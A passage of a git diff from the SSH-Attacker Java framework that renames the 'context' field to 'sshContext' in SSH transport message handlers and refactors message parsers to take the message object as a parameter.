(context.getChooser().getHybridKeyExchange().getCombiner()) { + switch (sshContext.getChooser().getHybridKeyExchange().getCombiner()) { case CLASSICAL_CONCATENATE_POSTQUANTUM: combined = KeyExchangeUtil.concatenateHybridKeys( message.getPublicKey().getValue(), message.getCombinedKeyShare().getValue()); - context.getExchangeHashInputHolder().setHybridServerPublicKey(combined); + sshContext.getExchangeHashInputHolder().setHybridServerPublicKey(combined); break; case POSTQUANTUM_CONCATENATE_CLASSICAL: combined = KeyExchangeUtil.concatenateHybridKeys( message.getCombinedKeyShare().getValue(), message.getPublicKey().getValue()); - context.getExchangeHashInputHolder().setHybridServerPublicKey(combined); + sshContext.getExchangeHashInputHolder().setHybridServerPublicKey(combined); break; default: LOGGER.warn( "Combiner" - + context.getChooser().getHybridKeyExchange().getCombiner() + + sshContext.getChooser().getHybridKeyExchange().getCombiner() + " is not supported."); break; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java index 334e4fd98..b2820ec4e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/KeyExchangeInitMessageHandler.java @@ -27,100 +27,100 @@ public KeyExchangeInitMessageHandler(SshContext context) { @Override public void adjustContext(KeyExchangeInitMessage message) { - if (context.isHandleAsClient()) { - context.setServerCookie(message.getCookie().getValue()); - context.setServerSupportedKeyExchangeAlgorithms( + if (sshContext.isHandleAsClient()) { + sshContext.setServerCookie(message.getCookie().getValue()); + sshContext.setServerSupportedKeyExchangeAlgorithms( Converter.nameListToEnumValues( message.getKeyExchangeAlgorithms().getValue(), KeyExchangeAlgorithm.class)); - context.setServerSupportedHostKeyAlgorithms( + sshContext.setServerSupportedHostKeyAlgorithms( Converter.nameListToEnumValues( message.getServerHostKeyAlgorithms().getValue(), PublicKeyAlgorithm.class)); - context.setServerSupportedEncryptionAlgorithmsClientToServer( + sshContext.setServerSupportedEncryptionAlgorithmsClientToServer( Converter.nameListToEnumValues( message.getEncryptionAlgorithmsClientToServer().getValue(), EncryptionAlgorithm.class)); - context.setServerSupportedEncryptionAlgorithmsServerToClient( + sshContext.setServerSupportedEncryptionAlgorithmsServerToClient( Converter.nameListToEnumValues( message.getEncryptionAlgorithmsServerToClient().getValue(), EncryptionAlgorithm.class)); - context.setServerSupportedMacAlgorithmsClientToServer( + sshContext.setServerSupportedMacAlgorithmsClientToServer( Converter.nameListToEnumValues( message.getMacAlgorithmsClientToServer().getValue(), MacAlgorithm.class)); - context.setServerSupportedMacAlgorithmsServerToClient( + sshContext.setServerSupportedMacAlgorithmsServerToClient( Converter.nameListToEnumValues( message.getMacAlgorithmsServerToClient().getValue(), MacAlgorithm.class)); - context.setServerSupportedCompressionMethodsClientToServer( + sshContext.setServerSupportedCompressionMethodsClientToServer( Converter.nameListToEnumValues( message.getCompressionMethodsClientToServer().getValue(), CompressionMethod.class)); - context.setServerSupportedCompressionMethodsServerToClient( + sshContext.setServerSupportedCompressionMethodsServerToClient( Converter.nameListToEnumValues( message.getCompressionMethodsServerToClient().getValue(), CompressionMethod.class)); - context.setServerSupportedLanguagesClientToServer( + sshContext.setServerSupportedLanguagesClientToServer( Arrays.asList( message.getLanguagesClientToServer() .getValue() .split("" + CharConstants.ALGORITHM_SEPARATOR))); - context.setServerSupportedLanguagesServerToClient( + sshContext.setServerSupportedLanguagesServerToClient( Arrays.asList( message.getLanguagesServerToClient() .getValue() .split("" + CharConstants.ALGORITHM_SEPARATOR))); - context.setServerReserved(message.getReserved().getValue()); + sshContext.setServerReserved(message.getReserved().getValue()); - context.getExchangeHashInputHolder().setServerKeyExchangeInit(message); + sshContext.getExchangeHashInputHolder().setServerKeyExchangeInit(message); } else { - context.setClientCookie(message.getCookie().getValue()); - context.setClientSupportedKeyExchangeAlgorithms( + sshContext.setClientCookie(message.getCookie().getValue()); + sshContext.setClientSupportedKeyExchangeAlgorithms( Converter.nameListToEnumValues( message.getKeyExchangeAlgorithms().getValue(), KeyExchangeAlgorithm.class)); - context.setClientSupportedHostKeyAlgorithms( + sshContext.setClientSupportedHostKeyAlgorithms( Converter.nameListToEnumValues( message.getServerHostKeyAlgorithms().getValue(), PublicKeyAlgorithm.class)); - context.setClientSupportedEncryptionAlgorithmsClientToServer( + sshContext.setClientSupportedEncryptionAlgorithmsClientToServer( Converter.nameListToEnumValues( message.getEncryptionAlgorithmsClientToServer().getValue(), EncryptionAlgorithm.class)); - context.setClientSupportedEncryptionAlgorithmsServerToClient( + sshContext.setClientSupportedEncryptionAlgorithmsServerToClient( Converter.nameListToEnumValues( message.getEncryptionAlgorithmsServerToClient().getValue(), EncryptionAlgorithm.class)); - context.setClientSupportedMacAlgorithmsClientToServer( + sshContext.setClientSupportedMacAlgorithmsClientToServer( Converter.nameListToEnumValues( message.getMacAlgorithmsClientToServer().getValue(), MacAlgorithm.class)); - context.setClientSupportedMacAlgorithmsServerToClient( + sshContext.setClientSupportedMacAlgorithmsServerToClient( Converter.nameListToEnumValues( message.getMacAlgorithmsServerToClient().getValue(), MacAlgorithm.class)); - context.setClientSupportedCompressionMethodsClientToServer( + sshContext.setClientSupportedCompressionMethodsClientToServer( Converter.nameListToEnumValues( message.getCompressionMethodsClientToServer().getValue(), CompressionMethod.class)); - context.setClientSupportedCompressionMethodsServerToClient( + sshContext.setClientSupportedCompressionMethodsServerToClient( Converter.nameListToEnumValues( message.getCompressionMethodsServerToClient().getValue(), CompressionMethod.class)); - context.setClientSupportedLanguagesClientToServer( + sshContext.setClientSupportedLanguagesClientToServer( Arrays.asList( message.getLanguagesClientToServer() .getValue() .split("" + CharConstants.ALGORITHM_SEPARATOR))); - context.setClientSupportedLanguagesServerToClient( + sshContext.setClientSupportedLanguagesServerToClient( Arrays.asList( message.getLanguagesServerToClient() .getValue() .split("" + CharConstants.ALGORITHM_SEPARATOR))); - context.setClientReserved(message.getReserved().getValue()); + sshContext.setClientReserved(message.getReserved().getValue()); - context.getExchangeHashInputHolder().setClientKeyExchangeInit(message); + sshContext.getExchangeHashInputHolder().setClientKeyExchangeInit(message); } pickAlgorithms(); @@ -129,64 +129,80 @@ public void adjustContext(KeyExchangeInitMessage message) { private void pickAlgorithms() { // if enforceSettings is true, the algorithms are expected to be // already set in the context - if (!context.getConfig().getEnforceSettings()) { - context.setKeyExchangeAlgorithm( + if (!sshContext.getConfig().getEnforceSettings()) { + sshContext.setKeyExchangeAlgorithm( AlgorithmPicker.pickAlgorithm( - context.getChooser().getClientSupportedKeyExchangeAlgorithms(), - context.getChooser().getServerSupportedKeyExchangeAlgorithms()) + sshContext + .getChooser() + .getClientSupportedKeyExchangeAlgorithms(), + sshContext + .getChooser() + .getServerSupportedKeyExchangeAlgorithms()) .orElse(null)); - context.setEncryptionAlgorithmClientToServer( + sshContext.setEncryptionAlgorithmClientToServer( AlgorithmPicker.pickAlgorithm( - context.getChooser() + sshContext + .getChooser() .getClientSupportedEncryptionAlgorithmsClientToServer(), - context.getChooser() + sshContext + .getChooser() .getServerSupportedEncryptionAlgorithmsClientToServer()) .orElse(null)); - context.setEncryptionAlgorithmServerToClient( + sshContext.setEncryptionAlgorithmServerToClient( AlgorithmPicker.pickAlgorithm( - context.getChooser() + sshContext + .getChooser() .getClientSupportedEncryptionAlgorithmsServerToClient(), - context.getChooser() + sshContext + .getChooser() .getServerSupportedEncryptionAlgorithmsServerToClient()) .orElse(null)); - context.setHostKeyAlgorithm( + sshContext.setHostKeyAlgorithm( AlgorithmPicker.pickAlgorithm( - context.getChooser().getClientSupportedHostKeyAlgorithms(), - context.getChooser().getServerSupportedHostKeyAlgorithms()) + sshContext.getChooser().getClientSupportedHostKeyAlgorithms(), + sshContext.getChooser().getServerSupportedHostKeyAlgorithms()) .orElse(null)); - context.setMacAlgorithmClientToServer( + sshContext.setMacAlgorithmClientToServer( AlgorithmPicker.pickAlgorithm( - context.getChooser() + sshContext + .getChooser() .getClientSupportedMacAlgorithmsClientToServer(), - context.getChooser() + sshContext + .getChooser() .getServerSupportedMacAlgorithmsClientToServer()) .orElse(null)); - context.setMacAlgorithmServerToClient( + sshContext.setMacAlgorithmServerToClient( AlgorithmPicker.pickAlgorithm( - context.getChooser() + sshContext + .getChooser() .getClientSupportedMacAlgorithmsServerToClient(), - context.getChooser() + sshContext + .getChooser() .getServerSupportedMacAlgorithmsServerToClient()) .orElse(null)); - context.setCompressionMethodClientToServer( + sshContext.setCompressionMethodClientToServer( AlgorithmPicker.pickAlgorithm( - context.getChooser() + sshContext + .getChooser() .getClientSupportedCompressionMethodsClientToServer(), - context.getChooser() + sshContext + .getChooser() .getServerSupportedCompressionMethodsClientToServer()) .orElse(null)); - context.setCompressionMethodServerToClient( + sshContext.setCompressionMethodServerToClient( AlgorithmPicker.pickAlgorithm( - context.getChooser() + sshContext + .getChooser() .getClientSupportedCompressionMethodsServerToClient(), - context.getChooser() + sshContext + .getChooser() .getServerSupportedCompressionMethodsServerToClient()) .orElse(null)); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/NewKeysMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/NewKeysMessageHandler.java index d4ad5ed0e..22e35b839 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/NewKeysMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/NewKeysMessageHandler.java @@ -31,7 +31,7 @@ public NewKeysMessageHandler(SshContext context) { @Override public void adjustContext(NewKeysMessage message) { - if (context.getConfig().getEnableEncryptionOnNewKeysMessage()) { + if (sshContext.getConfig().getEnableEncryptionOnNewKeysMessage()) { adjustEncryptionForDirection(true); } adjustCompressionForDirection(true); @@ -39,15 +39,15 @@ public void adjustContext(NewKeysMessage message) { @Override public void adjustContextAfterMessageSent() { - if (context.getConfig().getEnableEncryptionOnNewKeysMessage()) { + if (sshContext.getConfig().getEnableEncryptionOnNewKeysMessage()) { adjustEncryptionForDirection(false); } adjustCompressionForDirection(false); } private void adjustEncryptionForDirection(boolean receive) { - Chooser chooser = context.getChooser(); - Optional keySet = context.getKeySet(); + Chooser chooser = sshContext.getChooser(); + Optional keySet = sshContext.getKeySet(); if (keySet.isEmpty()) { LOGGER.warn( "Unable to update the active {} cipher after handling a new keys message because key set is missing - workflow will continue with old cipher", @@ -60,12 +60,12 @@ private void adjustEncryptionForDirection(boolean receive) { if (receive) { encryptionAlgorithm = chooser.getReceiveEncryptionAlgorithm(); macAlgorithm = chooser.getReceiveMacAlgorithm(); - KeySet activeKeySet = context.getPacketLayer().getDecryptorCipher().getKeySet(); + KeySet activeKeySet = sshContext.getPacketLayer().getDecryptorCipher().getKeySet(); EncryptionAlgorithm activeEncryptionAlgorithm = - context.getPacketLayer().getDecryptorCipher().getEncryptionAlgorithm(); + sshContext.getPacketLayer().getDecryptorCipher().getEncryptionAlgorithm(); MacAlgorithm activeMacAlgorithm = - context.getPacketLayer().getDecryptorCipher().getMacAlgorithm(); - if (!context.getConfig().getForcePacketCipherChange() + sshContext.getPacketLayer().getDecryptorCipher().getMacAlgorithm(); + if (!sshContext.getConfig().getForcePacketCipherChange() && Objects.equals(activeKeySet, keySet.get()) && encryptionAlgorithm == activeEncryptionAlgorithm && (encryptionAlgorithm.getType() == EncryptionAlgorithmType.AEAD @@ -77,12 +77,12 @@ private void adjustEncryptionForDirection(boolean receive) { } else { encryptionAlgorithm = chooser.getSendEncryptionAlgorithm(); macAlgorithm = chooser.getSendMacAlgorithm(); - KeySet activeKeySet = context.getPacketLayer().getEncryptorCipher().getKeySet(); + KeySet activeKeySet = sshContext.getPacketLayer().getEncryptorCipher().getKeySet(); EncryptionAlgorithm activeEncryptionAlgorithm = - context.getPacketLayer().getEncryptorCipher().getEncryptionAlgorithm(); + sshContext.getPacketLayer().getEncryptorCipher().getEncryptionAlgorithm(); MacAlgorithm activeMacAlgorithm = - context.getPacketLayer().getEncryptorCipher().getMacAlgorithm(); - if (!context.getConfig().getForcePacketCipherChange() + sshContext.getPacketLayer().getEncryptorCipher().getMacAlgorithm(); + if (!sshContext.getConfig().getForcePacketCipherChange() && Objects.equals(activeKeySet, keySet.get()) && encryptionAlgorithm == activeEncryptionAlgorithm && (encryptionAlgorithm.getType() == EncryptionAlgorithmType.AEAD @@ -96,15 +96,15 @@ private void adjustEncryptionForDirection(boolean receive) { try { PacketCipher packetCipher = PacketCipherFactory.getPacketCipher( - context, + sshContext, keySet.get(), encryptionAlgorithm, macAlgorithm, receive ? CipherMode.DECRYPT : CipherMode.ENCRYPT); if (receive) { - context.getPacketLayer().updateDecryptionCipher(packetCipher); + sshContext.getPacketLayer().updateDecryptionCipher(packetCipher); } else { - context.getPacketLayer().updateEncryptionCipher(packetCipher); + sshContext.getPacketLayer().updateEncryptionCipher(packetCipher); } } catch (IllegalArgumentException e) { LOGGER.warn( @@ -115,16 +115,16 @@ private void adjustEncryptionForDirection(boolean receive) { } private void adjustCompressionForDirection(boolean receive) { - Chooser chooser = context.getChooser(); + Chooser chooser = sshContext.getChooser(); CompressionMethod method = receive ? chooser.getReceiveCompressionMethod() : chooser.getSendCompressionMethod(); if (method == CompressionMethod.ZLIB) { if (receive) { - context.getPacketLayer().updateDecompressionAlgorithm(method.getAlgorithm()); + sshContext.getPacketLayer().updateDecompressionAlgorithm(method.getAlgorithm()); } else { - context.getPacketLayer().updateCompressionAlgorithm(method.getAlgorithm()); + sshContext.getPacketLayer().updateCompressionAlgorithm(method.getAlgorithm()); } } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangeDoneMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangeDoneMessageHandler.java index cf84f1bde..9ef621ffa 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangeDoneMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangeDoneMessageHandler.java @@ -24,10 +24,10 @@ public RsaKeyExchangeDoneMessageHandler(SshContext context) { @Override public void adjustContext(RsaKeyExchangeDoneMessage message) { - KeyExchangeUtil.computeExchangeHash(context); - KeyExchangeUtil.handleExchangeHashSignatureMessage(context, message); - KeyExchangeUtil.setSessionId(context); - KeyExchangeUtil.generateKeySet(context); + KeyExchangeUtil.computeExchangeHash(sshContext); + KeyExchangeUtil.handleExchangeHashSignatureMessage(sshContext, message); + KeyExchangeUtil.setSessionId(sshContext); + KeyExchangeUtil.generateKeySet(sshContext); } /*@Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangePubkeyMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangePubkeyMessageHandler.java index f4fda7a3b..7aeb297ed 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangePubkeyMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangePubkeyMessageHandler.java @@ -26,13 +26,16 @@ public RsaKeyExchangePubkeyMessageHandler(SshContext context) { @Override public void adjustContext(RsaKeyExchangePubkeyMessage message) { - KeyExchangeUtil.handleHostKeyMessage(context, message); + KeyExchangeUtil.handleHostKeyMessage(sshContext, message); updateContextWithTransientPublicKey(message); } private void updateContextWithTransientPublicKey(RsaKeyExchangePubkeyMessage message) { - context.getChooser().getRsaKeyExchange().setTransientKey(message.getTransientPublicKey()); - context.getExchangeHashInputHolder().setRsaTransientKey(message.getTransientPublicKey()); + sshContext + .getChooser() + .getRsaKeyExchange() + .setTransientKey(message.getTransientPublicKey()); + sshContext.getExchangeHashInputHolder().setRsaTransientKey(message.getTransientPublicKey()); } /*@Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangeSecretMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangeSecretMessageHandler.java index d5d6ded19..cd6375ae5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangeSecretMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/RsaKeyExchangeSecretMessageHandler.java @@ -33,10 +33,10 @@ public void adjustContext(RsaKeyExchangeSecretMessage message) { } private void decryptSharedSecret(RsaKeyExchangeSecretMessage message) { - RsaKeyExchange keyExchange = context.getChooser().getRsaKeyExchange(); + RsaKeyExchange keyExchange = sshContext.getChooser().getRsaKeyExchange(); try { keyExchange.decryptSharedSecret(message.getEncryptedSecret().getValue()); - context.setSharedSecret(keyExchange.getSharedSecret()); + sshContext.setSharedSecret(keyExchange.getSharedSecret()); } catch (CryptoException e) { LOGGER.warn( "Decryption of shared secret failed, unable to set shared secret in context"); @@ -45,8 +45,8 @@ private void decryptSharedSecret(RsaKeyExchangeSecretMessage message) { } private void updateExchangeHashWithSecrets(RsaKeyExchangeSecretMessage message) { - RsaKeyExchange keyExchange = context.getChooser().getRsaKeyExchange(); - ExchangeHashInputHolder inputHolder = context.getExchangeHashInputHolder(); + RsaKeyExchange keyExchange = sshContext.getChooser().getRsaKeyExchange(); + ExchangeHashInputHolder inputHolder = sshContext.getExchangeHashInputHolder(); inputHolder.setRsaEncryptedSecret(message.getEncryptedSecret().getValue()); if (keyExchange.isComplete()) { inputHolder.setSharedSecret(keyExchange.getSharedSecret()); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/VersionExchangeMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/VersionExchangeMessageHandler.java index 87156b47b..deede9cd8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/VersionExchangeMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/handler/VersionExchangeMessageHandler.java @@ -23,14 +23,14 @@ public VersionExchangeMessageHandler(SshContext context) { @Override public void adjustContext(VersionExchangeMessage message) { - if (context.isHandleAsClient()) { - context.setServerVersion(message.getVersion().getValue()); - context.setServerComment(message.getComment().getValue()); - context.getExchangeHashInputHolder().setServerVersion(message); + if (sshContext.isHandleAsClient()) { + sshContext.setServerVersion(message.getVersion().getValue()); + sshContext.setServerComment(message.getComment().getValue()); + sshContext.getExchangeHashInputHolder().setServerVersion(message); } else { - context.setClientVersion(message.getVersion().getValue()); - context.setClientComment(message.getComment().getValue()); - context.getExchangeHashInputHolder().setClientVersion(message); + sshContext.setClientVersion(message.getVersion().getValue()); + sshContext.setClientComment(message.getComment().getValue()); + sshContext.getExchangeHashInputHolder().setClientVersion(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/AsciiMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/AsciiMessageParser.java index 74f0ad1d9..0ce64193e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/AsciiMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/AsciiMessageParser.java @@ -29,17 +29,17 @@ public AsciiMessageParser(InputStream stream) { super(stream); } - @Override + /* @Override protected AsciiMessage createMessage() { return new AsciiMessage(); - } + }*/ public void parse(AsciiMessage message) { LOGGER.debug("Parsing ApplicationMessage"); - parseProtocolMessageContents(); + parseProtocolMessageContents(message); } - private void parseText() { + private void parseText(AsciiMessage message) { // parse till CR NL (and remove them) String result = this.parseStringTill(CharConstants.NEWLINE); if (result.endsWith("\r\n")) { @@ -56,8 +56,8 @@ private void parseText() { message.setText(result); } - @Override - public void parseProtocolMessageContents() { - parseText(); + // @Override + public void parseProtocolMessageContents(AsciiMessage message) { + parseText(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DebugMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DebugMessageParser.java index 9a65299e6..a6aa9a3f5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DebugMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DebugMessageParser.java @@ -37,22 +37,22 @@ public DebugMessageParser(InputStream stream) { @Override public void parse(DebugMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override + // @Override public DebugMessage createMessage() { return new DebugMessage(); } - private void parseAlwaysDisplay() { + private void parseAlwaysDisplay(DebugMessage message) { message.setAlwaysDisplay(parseByteField(1)); LOGGER.debug( "Always display: " + Converter.byteToBoolean(message.getAlwaysDisplay().getValue())); } - private void parseMessage() { + private void parseMessage(DebugMessage message) { message.setMessageLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Message length: " + message.getMessageLength().getValue()); message.setMessage( @@ -60,7 +60,7 @@ private void parseMessage() { LOGGER.debug("Message: " + backslashEscapeString(message.getMessage().getValue())); } - private void parseLanguageTag() { + private void parseLanguageTag(DebugMessage message) { message.setLanguageTagLength(parseIntField(DataFormatConstants.STRING_SIZE_LENGTH)); LOGGER.debug("Language tag length: " + message.getLanguageTagLength().getValue()); message.setLanguageTag( @@ -69,10 +69,10 @@ private void parseLanguageTag() { LOGGER.debug("Language tag: " + backslashEscapeString(message.getLanguageTag().getValue())); } - @Override - protected void parseMessageSpecificContents() { - parseAlwaysDisplay(); - parseMessage(); - parseLanguageTag(); + // @Override + protected void parseMessageSpecificContents(DebugMessage message) { + parseAlwaysDisplay(message); + parseMessage(message); + parseLanguageTag(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeGroupMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeGroupMessageParser.java index e84b3a639..f17399cb2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeGroupMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeGroupMessageParser.java @@ -32,12 +32,12 @@ public DhGexKeyExchangeGroupMessageParser(InputStream stream) { super(stream); } - @Override + /* @Override public DhGexKeyExchangeGroupMessage createMessage() { return new DhGexKeyExchangeGroupMessage(); - } + }*/ - private void parseGroupModulus() { + private void parseGroupModulus(DhGexKeyExchangeGroupMessage message) { message.setGroupModulusLength(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Group modulus length: " + message.getGroupModulusLength().getValue()); message.setGroupModulus(parseBigIntField(message.getGroupModulusLength().getValue())); @@ -47,7 +47,7 @@ private void parseGroupModulus() { message.getGroupModulus().getByteArray())); } - private void parseGroupGenerator() { + private void parseGroupGenerator(DhGexKeyExchangeGroupMessage message) { message.setGroupGeneratorLength(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Group generator length: " + message.getGroupGeneratorLength().getValue()); message.setGroupGenerator(parseBigIntField(message.getGroupGeneratorLength().getValue())); @@ -58,13 +58,13 @@ private void parseGroupGenerator() { } @Override - protected void parseMessageSpecificContents() { - parseGroupModulus(); - parseGroupGenerator(); + protected void parseMessageSpecificContents(DhGexKeyExchangeGroupMessage message) { + parseGroupModulus(message); + parseGroupGenerator(message); } @Override public void parse(DhGexKeyExchangeGroupMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeInitMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeInitMessageParser.java index f87e8a651..e4b17d031 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeInitMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeInitMessageParser.java @@ -32,12 +32,12 @@ public DhGexKeyExchangeInitMessageParser(InputStream stream) { super(stream); } - @Override + /* @Override protected DhGexKeyExchangeInitMessage createMessage() { return new DhGexKeyExchangeInitMessage(); - } + }*/ - public void parseEphemeralPublicKey() { + public void parseEphemeralPublicKey(DhGexKeyExchangeInitMessage message) { message.setEphemeralPublicKeyLength(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug( "Ephemeral public key (client) length: " + message.getEphemeralPublicKeyLength()); @@ -48,12 +48,12 @@ public void parseEphemeralPublicKey() { } @Override - protected void parseMessageSpecificContents() { - parseEphemeralPublicKey(); + protected void parseMessageSpecificContents(DhGexKeyExchangeInitMessage message) { + parseEphemeralPublicKey(message); } @Override public void parse(DhGexKeyExchangeInitMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeOldRequestMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeOldRequestMessageParser.java index e71018c5f..41fc83443 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeOldRequestMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeOldRequestMessageParser.java @@ -32,23 +32,23 @@ public DhGexKeyExchangeOldRequestMessageParser(InputStream stream) { super(stream); } - @Override + /* @Override protected DhGexKeyExchangeOldRequestMessage createMessage() { return new DhGexKeyExchangeOldRequestMessage(); - } + }*/ - public void parsePreferredGroupSize() { + public void parsePreferredGroupSize(DhGexKeyExchangeOldRequestMessage message) { message.setPreferredGroupSize(parseIntField(DataFormatConstants.UINT32_SIZE)); LOGGER.debug("Preferred group size: {} bits", message.getPreferredGroupSize().getValue()); } @Override - protected void parseMessageSpecificContents() { - parsePreferredGroupSize(); + protected void parseMessageSpecificContents(DhGexKeyExchangeOldRequestMessage message) { + parsePreferredGroupSize(message); } @Override public void parse(DhGexKeyExchangeOldRequestMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeReplyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeReplyMessageParser.java index db6e7520f..558c34fb6 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeReplyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeReplyMessageParser.java @@ -34,22 +34,22 @@ public DhGexKeyExchangeReplyMessageParser(InputStream stream) { @Override public void parse(DhGexKeyExchangeReplyMessage message) { - parseMessageSpecificContents(); + parseMessageSpecificContents(message); } - @Override + /* @Override public DhGexKeyExchangeReplyMessage createMessage() { return new DhGexKeyExchangeReplyMessage(); - } + }*/ - private void parseHostKeyBytes() { + private void parseHostKeyBytes(DhGexKeyExchangeReplyMessage message) { message.setHostKeyBytesLength(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); LOGGER.debug("Host key bytes length: " + message.getHostKeyBytesLength().getValue()); message.setHostKeyBytes(parseByteArrayField(message.getHostKeyBytesLength().getValue())); LOGGER.debug("Host key bytes: " + message.getHostKeyBytes()); } - private void parseEphemeralPublicKey() { + private void parseEphemeralPublicKey(DhGexKeyExchangeReplyMessage message) { message.setEphemeralPublicKeyLength( parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); LOGGER.debug( @@ -61,7 +61,7 @@ private void parseEphemeralPublicKey() { "Ephemeral public key (server): " + message.getEphemeralPublicKey().getValue()); } - private void parseSignature() { + private void parseSignature(DhGexKeyExchangeReplyMessage message) { message.setSignatureLength(parseIntField(BinaryPacketConstants.LENGTH_FIELD_LENGTH)); LOGGER.debug("Signature length: " + message.getSignatureLength().getValue()); message.setSignature(parseByteArrayField(message.getSignatureLength().getValue())); @@ -69,9 +69,9 @@ private void parseSignature() { } @Override - protected void parseMessageSpecificContents() { - parseHostKeyBytes(); - parseEphemeralPublicKey(); - parseSignature(); + protected void parseMessageSpecificContents(DhGexKeyExchangeReplyMessage message) { + parseHostKeyBytes(message); + parseEphemeralPublicKey(message); + parseSignature(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeRequestMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeRequestMessageParser.java index 13bf5c793..b470c7cf5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeRequestMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeRequestMessageParser.java @@ -29,36 +29,38 @@ public DhGexKeyExchangeRequestMessageParser(InputStream stream) { super(stream); } - @Override - public DhGexKeyExchangeRequestMessage createMessage() { - return new 